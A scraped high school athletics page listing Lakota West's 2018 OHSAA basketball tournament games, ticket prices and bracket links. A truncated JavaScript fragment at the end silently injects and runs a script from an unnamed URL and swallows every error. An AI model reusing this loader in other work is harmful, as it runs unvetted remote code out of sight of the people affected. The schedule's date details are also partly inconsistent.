Boys Basketball
Lakota West Girls and Boys Basketball OHSAA Tourney Info
2018 OHSAA Tourney Info:
Girls Basketball
Tourney Game: #1 Lakota West (19-2) vs. #31 Withrow (2-15) at Lakota East Tuesday, Feb 14th, 6:00 pm. WINNER plays #32 COLERAIN on Tues., Feb. 20th, 6:00pm
Tickets: Pre-sale tickets ($6) are available in the athletic office (7am-3:30pm). Tickets at the door are $7.
NO LAKOTA/GMC SPORT PASSES OR SENIOR CITIZEN DISCOUNTS WILL BE ACCEPTED! This an OHSAA hosted tournament event.
Link to OHSAA Brackets (Lakota West is in the Cincinnati 1 Sectional)
Boys Basketball
Tourney Game: #27 Lakota West (3-17) plays #9 LaSalle (12-9) at Lakota East Thuesday, February 22nd, 7:30pm. WINNER plays #11 HAMILTON on Tues., Feb. 27, 7:30pm
Tickets: Pre-sale tickets ($6) are available in the athletic office (7am-3:30pm). Tickets at the door are $7.
NO LAKOTA/GMC SPORT PASSES OR SENIOR CITIZEN DISCOUNTS WILL BE ACCEPTED! This an OHSAA hosted tournament event.
Link to OHSAA Brackets (Lakota West is in the Cincinnati 3 Sectional)
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();